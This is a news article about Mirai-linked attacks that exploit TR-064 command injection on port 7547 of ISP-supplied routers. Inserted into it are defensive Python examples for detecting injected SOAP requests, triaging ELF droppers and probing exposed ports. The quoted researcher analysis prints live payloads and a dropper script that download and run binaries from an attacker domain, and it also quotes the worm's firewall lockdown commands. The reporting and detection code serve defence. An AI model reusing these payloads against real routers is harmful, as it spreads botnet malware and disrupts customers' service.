Newly discovered router flaw being hammered by in-the-wild attacks

Online criminals—at least some of them wielding the notorious Mirai malware that transforms Internet-of-things devices into powerful denial-of-service cannons—have begun exploiting a critical flaw that may be present in millions of home routers.
Routers provided to customers of the German and Irish ISPs Deutsche Telekom and Eircom, respectively, have already been identified as vulnerable, according to recently published reports from researchers tracking the attacks. The attacks exploit weaknesses found in routers made by Zyxel, Speedport, and possibly other manufacturers. The devices leave Internet port 7547 open to outside connections. The exploits use the opening to send commands based on the TR-069 and related TR-064 protocols, which ISPs use to remotely manage large fleets of hardware. According to this advisory published Monday morning by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploits every five to 10 minutes.
SANS Dean of Research Johannes Ullrich said in Monday's post that exploits are almost certainly the cause of an outage that hit Deutsche Telekom customers over the weekend. In a Facebook update, officials with the German ISP said 900,000 customers are vulnerable to the attacks until their routers are rebooted and receive an emergency patch.
Earlier this month, researchers at security firm BadCyber reported that the same one-two port 7547/TR-064 exploit hit the home router of a reader in Poland. They went on to identify D1000 routers supplied by Eircom as also being susceptible and cited this post as support. The Shodan search engine shows that 41 million devices leave port 7547 open, while about five million expose TR-064 services to the outside world.
The attacks started shortly after researchers published attack code that exploited the exposed TR-064 service. Included as a module for the Metasploit exploitation framework, the attack code opens the port 80 Web interface that enables remote administration. From there, devices that use default or otherwise weak authentication passwords can be remotely commandeered and made to join botnets that carry out Internet-crippling denial-of-service attacks.
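The injection described above rides in the parameters of a TR-064 SetNTPServers request: a value that should be an NTP host name arrives carrying shell commands instead. As an added example (not code from the article, BadCyber or SANS), here is a Python check a defender could run over captured TR-064 SOAP requests, for instance from a honeypot or an ISP-side proxy, to flag NewNTPServer values that cannot be a host name or IP address. The two SOAP bodies are constructed samples modelled on the payload shapes quoted later in the article; the host name in them is a placeholder, and the check generalises to every NewNTPServerN parameter, not only NewNTPServer1.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a TR-064 SetNTPServers request whose NewNTPServer1
# value carries shell commands (placeholder host, not a real C2).
SAMPLE_MALICIOUS = """<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
   <NewNTPServer1>`cd /tmp;wget http://example.invalid/1;chmod 777 1;./1`</NewNTPServer1>
  </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# Constructed sample: the same action used as intended, setting a real NTP pool host.
SAMPLE_BENIGN = """<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
 <SOAP-ENV:Body>
  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
   <NewNTPServer1>0.pool.ntp.org</NewNTPServer1>
   <NewNTPServer2>192.0.2.10</NewNTPServer2>
  </u:SetNTPServers>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

# A legitimate value is a DNS host name or dotted IPv4 address, nothing else.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
SHELL_META = set("`;|&$(){}<>\n\t ")
SUSPECT_TOKENS = ("wget", "tftp", "chmod", "busybox", "/tmp", "/bin/sh")


def classify_ntp_value(value):
    """Return the reasons an NTP-server value looks injected; an empty list means it looks benign."""
    value = value.strip()
    if value == "":          # TR-064 allows an empty value to mean "unset"
        return []
    reasons = []
    if any(ch in SHELL_META for ch in value):
        reasons.append("shell metacharacters")
    if any(tok in value for tok in SUSPECT_TOKENS):
        reasons.append("command-like tokens")
    if not HOSTNAME_RE.match(value):
        reasons.append("not a valid hostname or IP address")
    return reasons


def inspect_soap(body):
    """Parse a SOAP body and map every suspicious NewNTPServerN parameter to its reasons."""
    root = ET.fromstring(body)
    findings = {}
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]          # strip any XML namespace prefix
        if tag.startswith("NewNTPServer"):
            reasons = classify_ntp_value(elem.text or "")
            if reasons:
                findings[tag] = reasons
    return findings


if __name__ == "__main__":
    for label, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, inspect_soap(body) or "no findings")
```

In production this would sit on whatever already sees port 7547 traffic (a honeypot, an IDS, or the ISP's ACS front end); the point of the host-name rule is that it rejects any encoding of a command, not just the backtick form seen in the wild.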
BadCyber researchers analyzed one of the malicious payloads delivered during the attacks and found it originated from a known Mirai command-and-control server.
"The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared," BadCyber researchers wrote in a blog post. "It looks like someone decided to weaponize it and create an Internet worm based on Mirai code."
All bases covered
To infect as many routers as possible, the attacks deliver three separate payload files, two tailored to devices running different types of MIPS chips and a third that targets routers with ARM silicon. Just like the Metasploit code, the malicious payloads use the exploit to open the remote administration interface and then attempt to log in using three different default passwords. The attack then closes port 7547 to prevent other criminal enterprises from taking control of the devices. The researchers wrote:
Logins and passwords are obfuscated (or “encrypted”) in the worm code using the same algorithm as does Mirai. The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list. Also the pseudorandom algorithm to scan IPs... looks like [it is] copied from Mirai source code. It looks like the author of the malware borrowed the Mirai code and mixed it with the Metasploit module to produce his worm.

The malware itself is really friendly as it closes the vulnerability once the router is infected. It performs the following command:

    busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
    busybox killall -9 telnetd

which should make the device “secure”... until next reboot. The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely.

Today we have seen new attack variants, namely

    cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh
    <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1>
    <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>

In one of them the download method is changed from wget to tftp, while the other one changes binary download to a script.

The script x.sh has the following contents:

    #!/bin/sh
    # https://www.instagram.com/p/bxI-TSk3p_/
    cd /var/tmp
    cd /tmp
    rm -f *
    wget http://l.ocalhost.host/1
    busybox chmod a+x 1
    chmod 777 1
    ./1
    rm -f *
    wget http://l.ocalhost.host/2
    busybox chmod a+x 2
    chmod 777 2
    ./2
    rm -f *
    wget http://l.ocalhost.host/3
    busybox chmod a+x 3
    chmod 777 3
    ./3
    rm -f *
    wget http://l.ocalhost.host/4
    busybox chmod a+x 4
    chmod 777 4
    ./4
    rm -f *
    wget http://l.ocalhost.host/5
    busybox chmod a+x 5
    chmod 777 5
    ./5
    rm -f *
    wget http://l.ocalhost.host/6
    busybox chmod a+x 6
    chmod 777 6
    ./6
    rm -f *
    wget http://l.ocalhost.host/7
    busybox chmod a+x 7
    chmod 777 7
    ./7
    rm -f *

Looks like the attacker wants some really wide coverage:

    1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
    4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
    5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
    6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
    7: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, stripped
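The file(1) listing above is what lets a responder tell, without running anything, which of the seven droppers could even execute on a given router model. As an added example (my code, not the article's or BadCyber's), the Python below reads the first 20 bytes of an ELF header, which is all that is needed for the class, byte order, object type and target machine, and labels a set of constructed header stubs shaped like the seven files in the listing. The stubs are fabricated for the example; the e_machine and EI_DATA values come from the ELF specification. Vendor-specific details such as "MIPS-I" or "cisco 4500" are derived by file(1) from e_flags and are deliberately not reproduced here.

```python
import struct

# e_machine values from the ELF specification for the architectures in the
# listing, plus two common desktop ones so unexpected samples are still named.
E_MACHINE = {
    2: "SPARC",
    3: "Intel 80386",
    4: "Motorola 68020",   # EM_68K; file(1) reports it as Motorola 68020
    8: "MIPS",
    20: "PowerPC",
    40: "ARM",
    42: "Renesas SH",
    62: "x86-64",
}
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}


def elf_identity(data):
    """Return (class, endianness, type, machine) from an ELF header, or None if data is not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class = {1: "32-bit", 2: "64-bit"}.get(data[4], "unknown-class")
    ei_data = data[5]                     # EI_DATA selects the byte order of every later field
    if ei_data == 1:
        endian, fmt = "LSB", "<"
    elif ei_data == 2:
        endian, fmt = "MSB", ">"
    else:
        return None
    e_type, e_machine = struct.unpack(fmt + "HH", data[16:20])
    return (
        ei_class,
        endian,
        E_TYPE.get(e_type, "type %d" % e_type),
        E_MACHINE.get(e_machine, "machine %d" % e_machine),
    )


def make_header(ei_class, ei_data, e_type, e_machine):
    """Constructed 20-byte ELF header prefix used only as test input; not a runnable binary."""
    fmt = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1]) + bytes(9)   # e_ident padded to 16 bytes
    return ident + struct.pack(fmt + "HH", e_type, e_machine)


# Constructed sample set mirroring the seven droppers named in the listing.
SAMPLES = {
    "1": make_header(1, 1, 2, 8),    # 32-bit LSB MIPS
    "2": make_header(1, 2, 2, 8),    # 32-bit MSB MIPS
    "3": make_header(1, 1, 2, 40),   # 32-bit LSB ARM
    "4": make_header(1, 1, 2, 42),   # 32-bit LSB Renesas SH
    "5": make_header(1, 2, 2, 20),   # 32-bit MSB PowerPC
    "6": make_header(1, 2, 2, 2),    # 32-bit MSB SPARC
    "7": make_header(1, 2, 2, 4),    # 32-bit MSB Motorola 68020
    "x.sh": b"#!/bin/sh\ncd /tmp\n",  # the shell dropper: not ELF at all
}


def triage(samples):
    """Map each sample name to a short file(1)-style description."""
    out = {}
    for name, data in samples.items():
        ident = elf_identity(data)
        out[name] = "not an ELF file" if ident is None else "ELF %s %s %s, %s" % ident
    return out


if __name__ == "__main__":
    for name, desc in triage(SAMPLES).items():
        print("%s: %s" % (name, desc))
```

Run against real captures, `triage` takes `{name: open(path, "rb").read(20)}`; reading only the header keeps the payloads inert and the script fast over a large corpus.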
According to researchers at security firm Kaspersky, the command-and-control servers are, interestingly, pointing to IP addresses assigned to the US military.
"Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again," Kaspersky researchers wrote in a blog post published around the same time this article went live. "For sure, this is some kind of trolling from the criminals who conducted the attack."
The TR-069 exploit is at least the second major update that Mirai has received since its source code was made public in October. Additional technical details about the vulnerability are available here, here, and here.
People who want to lock down their routers and have the necessary technical skills should reboot them and immediately check whether the devices are listening for incoming commands on port 7547. As mentioned above, most Mirai-infected devices will be locked down and will display few indications of compromise, although frequent reboots have been reported in at least some cases. Generally speaking, IoT devices are disinfected each time they're restarted. A good practice is to reboot them and immediately lock them down with a strong password, or, better yet, to disable remote administration.
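The check recommended above, as an added example that is not part of the article: a small Python script that tries a TCP connection to the ports the article names on a router's public address. It must be run from outside the home network (the TR-069 listener is on the WAN side, so a test from the LAN says nothing about it); the address in the script is a placeholder to replace with your own router's public IP. One caveat follows directly from the BadCyber quote: the worm drops packets to 7547 with iptables after infecting a device, so on an unpatched router a port that now looks closed or filtered is not evidence that the device is clean, only that nothing answered at that moment.

```python
import socket
import sys


def port_is_listening(host, port, timeout=3.0):
    """Return True if a TCP handshake to host:port completes within timeout, else False."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:           # refused, timed out, unreachable: all read as "not listening"
        return False


def check_management_ports(host, ports=(7547, 23, 80), timeout=3.0):
    """Probe the ports the article discusses: TR-069/TR-064 (7547), telnet (23), web admin (80)."""
    return {port: port_is_listening(host, port, timeout) for port in ports}


def local_listener():
    """Open a listening socket on a free loopback port, used to self-test the probe offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


if __name__ == "__main__":
    # Placeholder: pass your router's public (WAN) address as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"
    for port, listening in check_management_ports(target).items():
        state = "LISTENING" if listening else "closed or filtered"
        print("%s:%d %s" % (target, port, state))
    print("Note: after a reboot, a port that reopens is the signal to patch or disable remote administration.")
```

Repeating the probe right after the reboot the article recommends is the useful pattern: a reboot clears the infection and its iptables rule, so a 7547 that is closed before the reboot and open after it is the exposed, still-vulnerable state the ISP patch is meant to remove.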
Reviewed by Bizpodia on 00:41